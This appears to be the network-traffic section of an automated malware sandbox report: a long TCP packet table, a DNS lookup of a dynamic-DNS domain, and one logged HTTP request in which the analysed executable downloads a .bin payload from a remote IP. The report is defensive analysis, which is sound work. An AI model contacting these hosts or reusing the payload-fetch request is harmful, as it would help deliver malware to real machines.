Jan 2, 2022 02:28:35.415342093 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415344000 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415363073 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415400982 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415438890 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415477037 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415514946 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415555000 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415594101 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415606022 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415611029 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415613890 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415621996 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.416446924 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580219984 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580249071 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580265045 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580277920 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580293894 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580311060 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580327988 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580343962 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580359936 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580375910 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580393076 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580409050 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580425024 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580446005 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580461025 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580468893 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580481052 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580492973 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580504894 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580518007 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580529928 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580542088 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580553055 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580568075 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580585957 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580590010 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580595970 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580598116 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580598116 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580615044 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580631971 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580646038 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580648899 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580651045 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580661058 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580667019 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580682993 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580698967 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580712080 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580714941 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580730915 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580745935 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580764055 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580781937 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580785036 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580790043 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580797911 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580812931 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580828905 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580845118 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580878973 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580893993 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580893993 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580899000 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580900908 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.580909967 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580926895 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580941916 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580956936 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580972910 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.580988884 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581001043 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581016064 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581032991 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581048965 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581062078 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.581063986 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581065893 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.581068993 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.581080914 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581096888 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581113100 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581129074 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581142902 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.581171036 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.581175089 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.581497908 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.582397938 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582416058 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582433939 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582449913 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582465887 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582482100 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582494020 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582509995 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582523108 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582535028 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582551956 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582566023 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.582570076 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582572937 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.582576036 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.582581997 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.582672119 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.582681894 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.583343029 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.583362103 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.583378077 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.583393097 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.583406925 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.583496094 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.583509922 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.584639072 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:36.157344103 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:36.157444954 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:36.321877956 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:36.323997974 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:36.324229002 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:46.212836027 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:46.215162992 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:46.431281090 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:50.319370985 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:50.321774960 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:50.375221968 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:50.499887943 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:50.500010014 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:50.511482000 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:50.694118977 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:50.734733105 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:50.911951065 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:50.926825047 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.147985935 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.148114920 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.333210945 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333245993 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333257914 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333271027 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333286047 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333298922 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333314896 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333331108 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333455086 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.333498955 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.333838940 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333856106 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333868980 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.333921909 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510025024 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510076046 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510088921 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510104895 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510117054 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510133982 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510154009 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510169029 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510188103 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510212898 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510214090 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510234118 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510251999 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510262966 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510271072 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510278940 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510294914 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510308981 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510309935 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510324955 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510335922 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510356903 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510391951 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510416985 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510438919 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510453939 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510469913 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510481119 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.510493040 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.510539055 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687097073 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687129021 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687148094 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687172890 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687195063 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687206030 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687216997 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687241077 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687262058 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687264919 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687287092 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687309980 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687315941 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687330961 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687350988 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687354088 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687376976 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687400103 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687408924 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687422991 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687442064 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687458992 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687465906 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687474012 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687489986 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687491894 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687505960 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687520027 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687531948 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687535048 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687549114 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687565088 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687565088 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687582970 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687591076 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687601089 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687618017 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687618017 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687633991 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687649012 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687660933 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687660933 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687678099 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687695980 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687701941 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687706947 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687724113 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687740088 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687741041 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687757969 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687773943 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687788010 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687789917 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687805891 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687818050 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687823057 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687834978 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.687849998 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.687890053 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864559889 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864595890 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864614010 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864631891 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864655018 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864676952 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864698887 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864722013 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864748955 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864748955 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864775896 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864798069 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864806890 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864819050 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864840031 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864842892 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864862919 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864878893 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864901066 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864923000 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864942074 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864943027 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864967108 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.864976883 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.864993095 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865000963 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865017891 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865039110 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865056038 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865073919 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865080118 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865089893 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865107059 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865117073 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865122080 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865138054 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865148067 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865154028 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865169048 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865175009 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865184069 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865200043 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865200996 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865216017 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865227938 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865231991 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865247965 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865267038 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865268946 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865286112 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865302086 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865308046 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865318060 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865331888 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865334034 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865349054 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865365028 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865371943 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865381002 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865396023 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865406990 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865411997 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865427017 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865432978 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865442991 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865458965 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865458965 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865473986 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865485907 CET	62758	49845	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:51.865495920 CET	49845	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:51.865539074 CET	49845	62758	192.168.2.6	207.32.218.236

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2022 02:28:03.336359978 CET	56628	53	192.168.2.6	8.8.8.8
Jan 2, 2022 02:28:03.559317112 CET	53	56628	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 2, 2022 02:28:03.336359978 CET	192.168.2.6	8.8.8.8	0xd3ae	Standard query (0)	nhtaxfilling.ddnsgeek.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 2, 2022 02:28:03.559317112 CET	8.8.8.8	192.168.2.6	0xd3ae	No error (0)	nhtaxfilling.ddnsgeek.com		207.32.218.236	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

147.189.137.168

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49835	147.189.137.168	80	C:\Users\user\Desktop\g4FtSOZMD9.exe

Timestamp	kBytes transferred	Direction	Data
Jan 2, 2022 02:28:02.373486996 CET	8008	OUT	GET /1040_RyQoPlW98.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 147.189.137.168 Cache-Control: no-cache
